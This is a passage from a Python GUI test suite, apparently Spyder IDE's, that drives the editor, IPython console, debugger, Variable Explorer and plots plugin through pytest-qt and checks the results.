    module; both compute 10! = 3628800.
    """
    # ---- Setup ----
    # Get a reference to the code editor widget
    code_editor = main_window.editor.get_focus_widget()

    # ---- Run pyx file ----
    # Load test file
    main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))

    # Run file (F5)
    qtbot.keyClick(code_editor, Qt.Key_F5)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # Wait until an object appears; the longer timeout covers Cython
    # compilation time.
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=COMPILE_AND_EVAL_TIMEOUT)

    # Verify result
    shell = main_window.ipyconsole.get_current_shellwidget()
    assert shell.get_value('a') == 3628800

    # Reset and close file
    reset_run_code(qtbot, shell, code_editor, nsb)
    main_window.editor.close_file()

    # ---- Import pyx file ----
    # Load test file
    main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))

    # Run file
    qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=COMPILE_AND_EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('b') == 3628800

    # Close file
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
    """
    Test that notebooks are open from the Project explorer.

    Also checks that converting the notebook to a Python file opens the
    converted script with the expected contents.
    """
    projects = main_window.projects
    editorstack = main_window.editor.get_current_editorstack()

    # Create a temp project directory
    project_dir = to_text_string(tmpdir.mkdir('test'))

    # Create an empty notebook in the project dir
    nb = osp.join(LOCATION, 'notebook.ipynb')
    shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))

    # Create project
    with qtbot.waitSignal(projects.sig_project_loaded):
        projects._create_project(project_dir)

    # Select notebook in the project explorer
    idx = projects.explorer.treewidget.get_index('notebook.ipynb')
    projects.explorer.treewidget.setCurrentIndex(idx)

    # Press Enter there
    qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)

    # Assert that notebook was open
    assert 'notebook.ipynb' in editorstack.get_current_filename()

    # Convert notebook to a Python file
    projects.explorer.treewidget.convert_notebook(osp.join(project_dir, 'notebook.ipynb'))

    # Assert the converted script was open
    assert 'untitled' in editorstack.get_current_filename()

    # Assert its contents are the expected ones.
    # Use parse_version for the comparison: plain string comparison is
    # lexicographic and breaks for versions >= 10 ('10.0' < '5.4.0').
    file_text = editorstack.get_current_editor().toPlainText()
    if parse_version(nbconvert.__version__) >= parse_version('5.4.0'):
        expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
                         '\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
    else:
        expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
    assert file_text == expected_text

    # Close project
    projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
    """
    Test that file are run from the Project explorer.

    Opens a script via Enter in the project tree, runs it through the
    tree's Run action and checks the resulting variables in the console.
    """
    projects = main_window.projects
    editorstack = main_window.editor.get_current_editorstack()

    # Create a temp project directory
    project_dir = to_text_string(tmpdir.mkdir('test'))

    # Copy the test script into the project dir
    test_file = osp.join(LOCATION, 'script.py')
    shutil.copy(test_file, osp.join(project_dir, 'script.py'))

    # Create project
    with qtbot.waitSignal(projects.sig_project_loaded):
        projects._create_project(project_dir)

    # Select file in the project explorer
    idx = projects.explorer.treewidget.get_index('script.py')
    projects.explorer.treewidget.setCurrentIndex(idx)

    # Press Enter there
    qtbot.keyClick(projects.explorer.treewidget, Qt.Key_Enter)

    # Assert that the file was open
    assert 'script.py' in editorstack.get_current_filename()

    # Run Python file
    projects.explorer.treewidget.run([osp.join(project_dir, 'script.py')])

    # Wait until the new console is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Wait until all objects have appeared in the variable explorer
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Check variables value (these are the objects script.py defines)
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    # Close project
    projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
    """
    Test that new breakpoints are set in the IPython console.

    Starts a debug session, toggles a breakpoint in the editor and
    verifies Pdb's `b` command lists it.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Click the debug button
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    qtbot.mouseClick(debug_button, Qt.LeftButton)
    qtbot.wait(1000)

    # Set a breakpoint.
    # NOTE: toogle_breakpoint (sic) is the actual Spyder API name.
    code_editor = main_window.editor.get_focus_widget()
    code_editor.debugger.toogle_breakpoint(line_number=6)
    qtbot.wait(500)

    # Verify that the breakpoint was set via Pdb's `b` (list breakpoints)
    shell.pdb_execute("!b")
    qtbot.wait(500)
    assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()

    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
    """
    Test all the different ways we have to run code.

    Exercises: run file (F5), run line-by-line (F9), run cell and
    advance (Shift+Enter), rerun from console history, run cell
    (Ctrl+Enter), debug cell (Alt+Shift+Enter) and re-run last cell
    (Alt+Enter). The file is copied to a path with non-ascii characters
    to also cover unicode path handling.
    """
    # ---- Setup ----
    p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
         .join(u"runtest's file èáïü Øαôå 字分误.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run file ----
    qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Run lines ----
    # Run the whole file line by line with F9
    for _ in range(code_editor.blockCount()):
        qtbot.keyClick(code_editor, Qt.Key_F9)
        qtbot.wait(200)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Run cell and advance ----
    # Run the five cells present in file
    # Add an unnamed cell at the top of the file
    qtbot.keyClicks(code_editor, 'a = 10')
    qtbot.keyClick(code_editor, Qt.Key_Return)
    qtbot.keyClick(code_editor, Qt.Key_Up)
    for _ in range(5):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
        qtbot.wait(500)

    # Check for errors and the runcell function
    assert 'runcell' in shell._control.toPlainText()
    assert 'Error:' not in shell._control.toPlainText()
    control_text = shell._control.toPlainText()

    # Rerun the last cell from the console history (Up + Shift+Enter)
    shell.setFocus()
    qtbot.keyClick(shell._control, Qt.Key_Up)
    qtbot.wait(500)
    qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    code_editor.setFocus()

    assert control_text != shell._control.toPlainText()
    # Keep only the text appended by the rerun.
    control_text = shell._control.toPlainText()[len(control_text):]

    # Check for errors and the runcell function
    assert 'runcell' in control_text
    assert 'Error' not in control_text

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert ']: 10\n' in shell._control.toPlainText()
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Run cell ----
    # Run the first cell in file (Ctrl+Enter; Cmd on macOS)
    modifier = Qt.ControlModifier
    if sys.platform == 'darwin':
        modifier = Qt.MetaModifier
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('a') == 10

    # Press Ctrl+Enter a second time to verify that we're *not* advancing
    # to the next cell
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
    assert nsb.editor.source_model.rowCount() == 1

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Debug cell ------
    # Alt+Shift+Enter debugs the current cell; then continue with !c.
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return,
                       modifier=Qt.AltModifier | Qt.ShiftModifier)
    qtbot.keyClicks(shell._control, '!c')
    qtbot.keyClick(shell._control, Qt.Key_Enter)

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Re-run last cell ----
    # Run the first three cells in file
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)

    # Wait until objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
                    timeout=EVAL_TIMEOUT)

    # Clean namespace
    with qtbot.waitSignal(shell.executed):
        shell.execute('%reset -f')

    # Wait until there are no objects in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
                    timeout=EVAL_TIMEOUT)

    # Re-run last cell (Alt+Enter)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)
    assert shell.get_value('li') == [1, 2, 3]

    # ---- Closing test file ----
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
                         [{'spy_config': ('editor', 'run_cell_copy', True)}],
                         indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
    """
    Test that the run_cell_copy option pastes cell code into the console.

    With run_cell_copy enabled, cells are executed by copying their
    source into the console instead of calling runcell.
    """
    # ---- Setup ----
    p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
         .join(u"runtest's file èáïü Øαôå 字分误.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Make sure run_cell_copy is properly set
    for editorstack in main_window.editor.editorstacks:
        editorstack.set_run_cell_copy(True)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run cell and advance ----
    # Run the cells present in file (four Shift+Enter presses)
    for _ in range(4):
        qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
        qtbot.wait(500)

    # Check for errors and that the code was copied (no runcell call)
    assert 'runcell' not in shell._control.toPlainText()
    assert 'a = 10' in shell._control.toPlainText()
    assert 'Error:' not in shell._control.toPlainText()

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert ']: 10\n' in shell._control.toPlainText()
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    # ---- Closing test file and reset config ----
    main_window.editor.close_file()
    CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('CI', None) is None or PYQT5,
                    reason="It times out sometimes on Windows, it's not "
                           "meant to be run outside of a CI and it segfaults "
                           "too frequently in PyQt5")
def test_open_files_in_new_editor_window(main_window, qtbot):
    """
    This tests that opening files in a new editor window
    is working as expected.

    Test for spyder-ide/spyder#4085.
    """
    # Set a timer to manipulate the open dialog while it's running,
    # since editor.load() below blocks on that modal dialog.
    QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
                                                        'script.py',
                                                        directory=LOCATION))

    # Create a new editor window
    # Note: editor.load() uses the current editorstack by default
    main_window.editor.create_new_window()
    main_window.editor.load()

    # Perform the test
    # Note: There's always one file open in the Editor, so opening one
    # more gives a stack count of 2.
    editorstack = main_window.editor.get_current_editorstack()
    assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
    """Test closing spyder when there is a file with modifications open."""
    # Don't proceed until the console prompt is available.
    shellwidget = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shellwidget._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Open a file and flag its document as modified without actually
    # typing anything into it.
    script_path = osp.join(LOCATION, 'script.py')
    main_window.editor.load(script_path)
    current_stack = main_window.editor.get_current_editorstack()
    current_editor = current_stack.get_current_editor()
    current_editor.document().setModified(True)

    # Give the app time to segfault if the original bug is present.
    qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
    """Test that the maximize button is working correctly."""
    # Give keyboard focus to the Editor so it is the plugin that the
    # maximize action operates on.
    main_window.editor.get_focus_widget().setFocus()

    # Locate the maximize button on the main toolbar.
    maximize_action = main_window.layouts.maximize_action
    maximize_button = main_window.main_toolbar.widgetForAction(maximize_action)

    # A first click maximizes the Editor ...
    qtbot.mouseClick(maximize_button, Qt.LeftButton)
    assert main_window.editor._ismaximized

    # ... and a second click restores it again.
    qtbot.mouseClick(maximize_button, Qt.LeftButton)
    assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif((os.name == 'nt' or
                     os.environ.get('CI', None) is not None and PYQT_VERSION >= '5.9'),
                    reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
    """
    Test for a segfault when these steps are followed:

    1. Open an object present in the Variable Explorer (e.g. a list).
    2. Delete that object in its corresponding console while its
       editor is still open.
    3. Closing that editor by pressing its *Ok* button.
    """
    # Create the object
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('myobj = [1, 2, 3]')

    # Open editor associated with that object and get a reference to it
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
    nsb.editor.setFocus()
    nsb.editor.edit_item()
    # The delegate keeps the open editors keyed by an internal id.
    obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
    obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']

    # Move to the IPython console and delete that object
    main_window.ipyconsole.get_focus_widget().setFocus()
    with qtbot.waitSignal(shell.executed):
        shell.execute('del myobj')
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)

    # Close editor via its Ok button
    ok_widget = obj_editor.btn_close
    qtbot.mouseClick(ok_widget, Qt.LeftButton)

    # Give the app time to segfault if the bug is present
    qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
    """
    Test for errors when editing inline values in the Variable Explorer
    and then moving to another plugin.

    Note: Errors for this test don't appear related to it but instead they
    are shown down the road. That's because they are generated by an
    async C++ RuntimeError.
    """
    # Create object
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Start editing the object inline in the Variable Explorer
    main_window.variableexplorer.change_visibility(True)
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
    nsb.editor.setFocus()
    nsb.editor.edit_item()

    # Change focus to IPython console while the inline editor is open
    main_window.ipyconsole.get_focus_widget().setFocus()

    # Give time for the async error to surface if the bug is present
    qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
    """
    Test that c and n Pdb commands update the Variable Explorer.

    Steps into a debug session with a breakpoint, then checks that each
    `c`/`n` command makes newly-defined objects appear in the Variable
    Explorer, and that `n` does not step into sitecustomize.py after the
    script ends.
    """
    nsb = main_window.variableexplorer.current_widget()

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Click the debug button
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Set a breakpoint (toogle_breakpoint (sic) is the actual API name)
    code_editor = main_window.editor.get_focus_widget()
    code_editor.debugger.toogle_breakpoint(line_number=6)
    qtbot.wait(500)

    # Verify that c works: continuing to the breakpoint defines one object
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!c')
        qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.waitUntil(
        lambda: nsb.editor.source_model.rowCount() == 1)

    # Verify that n works: one more object after stepping a line
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!n')
        qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.waitUntil(
        lambda: nsb.editor.source_model.rowCount() == 2)

    # Verify that doesn't go to sitecustomize.py with next and stops
    # the debugging session.
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!n')
        qtbot.keyClick(control, Qt.Key_Enter)

    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!n')
        qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.waitUntil(
        lambda: nsb.editor.source_model.rowCount() == 3)

    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!n')
        qtbot.keyClick(control, Qt.Key_Enter)

    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!n')
        qtbot.keyClick(control, Qt.Key_Enter)

    with qtbot.waitSignal(shell.executed):
        qtbot.keyClicks(control, '!n')
        qtbot.keyClick(control, Qt.Key_Enter)

    # Assert that a regular prompt appears (debugging has finished)
    shell.clear_console()
    assert 'In [2]:' in control.toPlainText()

    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_stop_dbg(main_window, qtbot):
    """
    Test that we correctly stop a debugging session.

    Starts debugging, steps once, then uses the stop button and verifies
    no extra ipdb prompts were produced.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Click the debug button
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    qtbot.mouseClick(debug_button, Qt.LeftButton)
    qtbot.wait(1000)

    # Move to the next line
    shell.pdb_execute("!n")
    qtbot.wait(1000)

    # Stop debugging via the stop button on the debug toolbar
    stop_debug_action = main_window.debug_toolbar_actions[5]
    stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
    qtbot.mouseClick(stop_debug_button, Qt.LeftButton)
    qtbot.wait(1000)

    # Assert there are only two ipdb prompts in the console
    assert shell._control.toPlainText().count('IPdb') == 2

    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
    """
    Test that using the Working directory toolbar is working while debugging.

    Enters a debug session, switches the cwd to the system temp dir via
    the Working directory plugin, and checks os.getcwd() in the console
    reflects it.
    """
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Load test file to be able to enter in debugging mode
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Give focus to the widget that's going to receive clicks
    control = main_window.ipyconsole.get_focus_widget()
    control.setFocus()

    # Click the debug button
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    qtbot.mouseClick(debug_button, Qt.LeftButton)
    qtbot.wait(1000)

    # Set the system temp dir as cwd through the Working directory plugin
    main_window.workingdirectory.chdir(tempfile.gettempdir())
    qtbot.wait(1000)
    shell.clear_console()
    qtbot.wait(500)

    # Get cwd in console
    qtbot.keyClicks(control, 'import os; os.getcwd()')
    qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.wait(1000)

    # Assert cwd is the right one
    assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
    """
    Test that %varexp is working while debugging.

    Steps into a debug session until a plottable object exists, then
    plots it from the Variable Explorer and checks an image appears in
    the console.
    """
    nsb = main_window.variableexplorer.current_widget()

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Load test file to be able to enter in debugging mode
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Give focus to the widget that's going to receive clicks
    control = main_window.ipyconsole.get_focus_widget()
    control.setFocus()

    # Click the debug button
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Step twice to get to an object that can be plotted
    for _ in range(2):
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClicks(control, '!n')
            qtbot.keyClick(control, Qt.Key_Enter)

    # Generate the plot from the Variable Explorer
    nsb.editor.plot('li', 'plot')
    qtbot.wait(1000)

    # Assert that there's exactly one plot image in the console
    assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
    'main_window',
    [{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
     {'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
    indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
    """
    Test that plots generated in the IPython console are properly displayed
    in the plots plugin.

    Parametrized over both inline figure formats (0 = PNG, 1 = SVG) and
    compares the console's image against the one saved by the Plots
    plugin.
    """
    assert CONF.get('plots', 'mute_inline_plotting') is False
    shell = main_window.ipyconsole.get_current_shellwidget()
    figbrowser = main_window.plots.current_widget()

    # Wait until the window is fully up.
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Generate a plot inline.
    with qtbot.waitSignal(shell.executed):
        shell.execute(("import matplotlib.pyplot as plt\n"
                       "fig = plt.plot([1, 2, 3, 4], '.')\n"))

    # The figure canvas format must match the configured inline format.
    if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
        assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
    else:
        assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'

    # Get the image name from the html, fetch the image from the shell, and
    # save it as a png.
    html = shell._control.toHtml()
    img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)

    ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
    ipython_qimg = shell._get_image(img_name)
    ipython_qimg.save(ipython_figname)

    # Save the image with the Plots plugin as a png, mocking out the
    # file-save dialog so the test runs unattended.
    plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
    mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
                 return_value=(plots_figname, '.png'))
    figbrowser.save_figure()

    # Both images must match within tolerance.
    assert compare_images(ipython_figname, plots_figname, 0.1) is None
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    (parse_version(ipy_release.version) >= parse_version('7.23.0') and
     parse_version(ipykernel.__version__) <= parse_version('5.5.3')),
    reason="Fails due to a bug in the %matplotlib magic")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
    """
    Test that the option to set bbox_inches to 'tight' or 'None' is
    working when plotting inline in the IPython console. By default, figures
    are plotted inline with bbox_inches='tight'.

    Strategy: draw the same figure twice — once captured inline by the
    console and once written to disk by savefig with an explicit
    bbox_inches — and compare the two images pixel-wise.
    """
    tmpdir = to_text_string(tmpdir)
    # Assert that the default is True.
    assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True
    fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
    fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
    fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))
    # Wait until the window is fully up.
    shell = main_window.ipyconsole.get_current_shellwidget()
    client = main_window.ipyconsole.get_current_client()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Give focus to the widget that's going to receive clicks
    control = main_window.ipyconsole.get_focus_widget()
    control.setFocus()
    # Generate a plot inline with bbox_inches=tight (since it is default) and
    # save the figure with savefig.
    savefig_figname = osp.join(
        tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
    with qtbot.waitSignal(shell.executed):
        shell.execute(("import matplotlib.pyplot as plt\n"
                       "fig, ax = plt.subplots()\n"
                       "fig.set_size_inches(%f, %f)\n"
                       "ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
                       "ax.set_xticks(range(10))\n"
                       "ax.xaxis.set_ticklabels([])\n"
                       "ax.set_yticks(range(10))\n"
                       "ax.yaxis.set_ticklabels([])\n"
                       "ax.tick_params(axis='both', length=0)\n"
                       "for loc in ax.spines:\n"
                       "    ax.spines[loc].set_color('#000000')\n"
                       "    ax.spines[loc].set_linewidth(2)\n"
                       "ax.axis([0, 9, 0, 9])\n"
                       "ax.plot(range(10), color='#000000', lw=2)\n"
                       "fig.savefig('%s',\n"
                       "            bbox_inches='tight',\n"
                       "            dpi=%f)"
                       ) % (fig_width, fig_height, savefig_figname, fig_dpi))
    # Get the image name from the html, fetch the image from the shell, and
